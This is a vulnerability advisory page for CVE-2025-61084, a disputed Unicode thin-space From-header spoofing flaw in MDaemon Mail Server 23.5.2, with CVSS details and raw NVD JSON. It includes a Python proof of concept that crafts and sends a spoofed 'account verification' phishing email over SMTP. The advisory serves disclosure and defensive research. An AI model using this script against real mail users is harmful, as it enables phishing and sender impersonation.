Security Vulnerability Report
CVE-2025-61084 CVSS 7.1 HIGH

CVE-2025-61084

Published: 2025-11-05 15:15:40
Last Modified: 2026-04-15 00:35:42

Description

MDaemon Mail Server 23.5.2 validates SPF, DKIM, and DMARC using the email enclosed in angle brackets (<>) in the From: header of SMTP DATA. An attacker can craft a From: header with multiple invisible Unicode thin spaces to display a spoofed sender while passing validation, allowing email spoofing even when anti-spoofing protections are in place. NOTE: this is disputed by the Supplier because UI spoofing occurs in a client, not in a server such as MDaemon's product or any other server implementation. Also, if a client without its own spoofing protection must be used, the Header Screening feature in MDaemon's product can be employed to mitigate the client-side vulnerability.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

MDaemon Mail Server 23.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61084 PoC - MDaemon Unicode Space Email Spoofing
# This PoC demonstrates how invisible Unicode thin spaces can bypass SPF/DKIM/DMARC validation
import smtplib
from email.mime.text import MIMEText
from email.header import Header


def create_spoofed_email():
    # Unicode thin space (U+2009) - invisible character
    thin_space = '\u2009'

    # Crafted From header that displays legitimate sender but actually from attacker
    # The server validates '[email protected]' but client displays '[email protected]'
    spoofed_display_name = '[email protected]' + (thin_space * 10)

    # From header format: Display Name <[email protected]>
    from_header = f'{spoofed_display_name} <[email protected]>'

    msg = MIMEText('Your account requires verification.', 'plain', 'utf-8')
    msg['From'] = from_header
    msg['To'] = '[email protected]'
    msg['Subject'] = Header('Urgent: Account Security Alert', 'utf-8')
    return msg


def send_spoofed_email(smtp_server, smtp_port, from_addr, to_addr):
    msg = create_spoofed_email()
    try:
        with smtplib.SMTP(smtp_server, smtp_port) as server:
            server.starttls()
            # Attacker controls this address which passes validation
            server.sendmail(from_addr, [to_addr], msg.as_string())
            print('[+] Spoofed email sent successfully')
            print('[+] From displayed: [email protected]')
            print('[+] From validated: [email protected]')
    except Exception as e:
        print(f'[-] Error: {e}')


if __name__ == '__main__':
    # Target MDaemon mail server
    TARGET = 'vulnerable-mdaemon-server.com'
    PORT = 25
    # Attacker controlled email that passes validation
    ATTACKER_EMAIL = '[email protected]'
    VICTIM_EMAIL = '[email protected]'
    send_spoofed_email(TARGET, PORT, ATTACKER_EMAIL, VICTIM_EMAIL)
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-61084",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-05T15:15:39.997",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["disputed"]}
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "MDaemon Mail Server 23.5.2 validates SPF, DKIM, and DMARC using the email enclosed in angle brackets (<>) in the From: header of SMTP DATA. An attacker can craft a From: header with multiple invisible Unicode thin spaces to display a spoofed sender while passing validation, allowing email spoofing even when anti-spoofing protections are in place. NOTE: this is disputed by the Supplier because UI spoofing occurs in a client, not in a server such as MDaemon's product or any other server implementation. Also, if a client without its own spoofing protection must be used, the Header Screening feature in MDaemon's product can be employed to mitigate the client-side vulnerability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-20"},
          {"lang": "en", "value": "CWE-116"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-61084/README.md",
        "source": "[email protected]"
      }
    ]
  }
}
```